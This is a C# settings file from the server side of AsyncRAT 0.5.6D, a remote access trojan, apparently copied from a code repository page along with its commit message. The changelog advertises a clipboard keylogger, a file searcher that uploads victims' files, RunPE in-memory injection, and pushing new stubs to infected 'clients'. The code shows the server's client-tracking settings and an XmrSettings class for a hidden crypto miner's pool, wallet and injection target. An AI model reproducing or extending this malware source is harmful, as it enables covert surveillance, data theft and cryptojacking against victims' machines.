NYAN CAT c542975a12 Update
fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
added gorup to listview
updated plugin save method
updated runpe send to memory
minor improvements

## NOTE
You need to create a new stub from this version, and then use your old version to update all your clients, otherwise you won't be able to use the new plugins
2020-04-22 00:52:58 +03:00

40 lines
1.4 KiB
C#

using Server.Algorithm;
using Server.Connection;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography.X509Certificates;
using System.Windows.Forms;
namespace Server
{
public static class Settings
{
public static List<string> Blocked = new List<string>();
public static object LockBlocked = new object();
public static long SentValue { get; set; }
public static long ReceivedValue { get; set; }
public static object LockReceivedSendValue = new object();
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.6D";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();
public static bool ReportWindow = false;
public static List<Clients> ReportWindowClients = new List<Clients>();
public static object LockReportWindowClients = new object();
}
public static class XmrSettings
{
public static string Pool = "";
public static string Wallet = "";
public static string Pass = "";
public static string InjectTo = "";
public static string Hash = "";
}
}